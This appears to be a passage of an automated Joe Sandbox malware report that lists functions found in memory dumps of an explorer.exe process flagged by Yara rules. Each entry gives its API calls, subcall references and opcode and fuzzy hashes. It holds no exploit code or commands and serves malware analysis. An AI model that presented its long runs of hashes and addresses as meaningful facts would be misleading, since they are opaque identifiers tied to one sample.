                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: 1a1195afae469592b6bf64f01ef81a19f9f798988fa32f519e60946213657c6c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2951B236705B4193EB20EF16E98076A73A4FB88B98F584235DF4D47B12EF38D4668744
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEF73F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEF73E8
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DEF7472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEF7483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEF748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 9493a502638ef36096f7c4dd4e8d0606dbfdec080f7f6f7f6e72ca44778ace5e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25417B30518B1E8FCB25FF1884502B6B7E0FB94329BA5526EE6DAD7194EF34C482C341
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 082473F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 082473E8
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08247472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 08247483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 01a26e0c69c83ce7d0bedd7e69ba3fdd9354a2db392884a8dcfe46858de39600
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B241F734534A5F8FCB2CAB6984542B577E0FB54323B94526EE4A6CB194EB34C483C761
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0A73F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0A73E8
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E0A7472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0A7483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0A748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 80b68dbe9bad6367c9fdccbab3ba30668951099dac928650481486985181625c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9413831518A1E4BCB64BBA984602B677E0FB50361B9C862FE5D6C7194EB28CC82D341
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFCBECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFCBEC0
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFCBF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFCBF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 46ef1a0562560f44b9395a3755c722fc2ea46cf7ffabfe3cdcbd27a990bd860f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5641367AE003D781DB249B6A97422B9B360FB40BD5F98E11EEB8947B84D738C271C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E12BECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E12BEC0
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E12BF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E12BF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 1fae0eedea13e7934395aa5d40c09af33f5087a252c2e86b9cf16e868cc2ad13
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE413776A143B581DF249B229950ABEB3A0FB40BD4FA8413EDF8547684D738CDE1C748
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF6BECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF6BEC0
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF6BF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF6BF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 8b433d46a7c6863b17be1eac8004dabb6390a27a238827a7df8dac130a9b1418
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9141D372E1039681DB249B6195402B9B360FF90BD5FC84216EFD5D7B96DF38E2529B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFC7ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFC7AB3
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFC7B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFC7B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFC7B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 78646bb7def22894f6f68c8e199dc15ce9c06e0d689ffa32dd8aa3153b83b65d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC312E76E183A382CB24BB1EDA501B97360E750BE5B94D12ED7D90B68CD728C971CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E127ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E127AB3
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E127B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E127B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E127B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: dd72cc2eb182a2100d2e92766020ace7c20ef760ed039be57ed5d14d186a1a2d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1031EA726142B182DF24AB16DD601BB73A1F740BA5BA8413FEB9507AC8D729CDF1C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF67ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF67AB3
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0FF67B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF67B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF67B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: ceee55006db3de5b5e46def32512ef2a26fa921cd65bafa126cdc8a0c9353475
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2313973E143A182CB24BB2294501BD73A0EF44FE9BD48226EBD54B6AEEF2CD551D700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DEF42A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DEF4331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4284
                                                                                                                                                                                                                          • Part of subcall function 0DEF21D1: _getptd_noexit.LIBCMT ref: 0DEF21D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 1c416f0777dd2303c47883f76be989f2e67be4c1c154e27dd8b0520332ca4580
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3318C70218B058FDB34EF58C491B6AB3E1FB98324F51155DD68AD3251DB31E842CB82
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 082442A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 08244331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244284
                                                                                                                                                                                                                          • Part of subcall function 082421D1: _getptd_noexit.LIBCMT ref: 082421D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 44f8c629456bf507e8cf922ef7c8d535af27db167ba82b2579fb1e8248cc275b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B317874228B05CFC738EF58C491B6AB7E1FB98326F51155DD48A83251DB31E883CB92
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E0A42A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E0A4331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4284
                                                                                                                                                                                                                          • Part of subcall function 0E0A21D1: _getptd_noexit.LIBCMT ref: 0E0A21D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: d5f1f599474da70cfea46aa029aa5caf57483874c95bb3ac20670788dd340583
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1318C35218B088FCB78EF99C491BA9B3E1FB98310F55096DD59A87251DB71FC42CB82
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10A56F
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0E10A596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0E10A615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: 2b747f8fee752c35aec53455e17936b21fe7da5a9e4506e6752c7bb91d9de3ae
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F821807121AB81C5EB14DF22F85039AB7E5FB88B84F448825DA8D47B98EFBCC584C741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4A56F
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0FF4A596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0FF4A615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: 9f3a52a47a4a16f4adad46efdfd43144b326c790a0bed624c51fb5740ee60936
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD215E31609B42C5EB24DF21A84036ABBA5FF88BC4F848135DA8947B15EF3CD159C744
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: f8f179cae309b43c4cd9b016149054a33b82aae11ec098de20bb118da8b1cdf1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DE0ED3851511ACFD7267F6485493B532A1FF59219F8761A1CB84CA1A1EFBCC4C08A57
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
